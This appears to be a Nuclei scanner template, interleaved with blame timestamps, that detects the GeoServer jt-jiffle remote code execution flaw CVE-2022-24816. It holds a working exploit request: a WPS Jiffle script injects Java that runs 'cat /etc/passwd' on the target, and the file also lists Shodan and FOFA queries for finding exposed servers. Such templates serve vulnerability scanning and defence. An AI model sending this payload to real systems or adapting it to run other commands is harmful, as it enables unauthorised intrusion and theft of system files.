2022-12-30 08:27:33 +00:00
id : CVE-2022-24816
info :
2023-03-27 17:46:47 +00:00
name : GeoServer <1.2.2 - Remote Code Execution
2022-12-30 08:27:33 +00:00
author : mukundbhuva
severity : critical
2022-12-31 09:46:02 +00:00
description : |
2023-03-27 17:46:47 +00:00
Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
2023-09-06 11:59:08 +00:00
remediation : 1.2 .22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath.
2022-12-30 08:27:33 +00:00
reference :
- https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html
2023-01-05 11:21:19 +00:00
- https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
- https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb
2023-03-27 17:46:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-24816
2024-03-23 09:28:19 +00:00
- https://github.com/tanjiti/sec_profile
2022-12-30 08:27:33 +00:00
classification :
2023-01-05 11:21:19 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-12-30 08:27:33 +00:00
cve-id : CVE-2022-24816
2023-01-05 11:21:19 +00:00
cwe-id : CWE-94
2024-03-23 09:28:19 +00:00
epss-score : 0.86265
epss-percentile : 0.98506
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:*
2022-12-30 08:27:33 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : geosolutionsgroup
product : jai-ext
2023-09-06 11:59:08 +00:00
shodan-query : /geoserver/
fofa-query : app="GeoServer"
2023-12-05 09:50:33 +00:00
tags : cve,cve2022,geoserver,rce,geosolutionsgroup
2022-12-30 08:27:33 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-12-30 08:27:33 +00:00
- raw :
- |
POST /geoserver/wms HTTP/1.1
Host : {{Hostname}}
2022-12-30 08:44:38 +00:00
Content-Type : application/xml
2022-12-30 08:27:33 +00:00
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>ras:Jiffle</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>coverage</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>script</ows:Identifier>
<wps:Data>
2022-12-31 09:46:02 +00:00
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
2022-12-30 08:27:33 +00:00
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>outputType</ows:Identifier>
<wps:Data>
<wps:LiteralData>DOUBLE</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/tiff">
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
2022-12-31 09:51:45 +00:00
matchers-condition : and
2022-12-30 08:27:33 +00:00
matchers :
2022-12-31 09:46:02 +00:00
- type : regex
2022-12-30 08:27:33 +00:00
part : body
2022-12-31 09:46:02 +00:00
regex :
- "root:.*:0:0:"
2022-12-31 09:51:45 +00:00
- "ExceptionInInitializerError"
2022-12-30 09:05:28 +00:00
condition : and
2022-12-31 09:51:45 +00:00
2022-12-30 08:27:33 +00:00
- type : status
status :
- 200
2024-01-14 14:05:19 +00:00
# digest: 4a0a00473045022001bcd7b58f17b3c60455f2b85090f996c030927b9e383f28395455661349fc46022100f27b9b4d5d6674797987d82865aef7a57954aa5d20b44297ce74bae876d3ae10:922c64590222798bb761d5b6d8e72950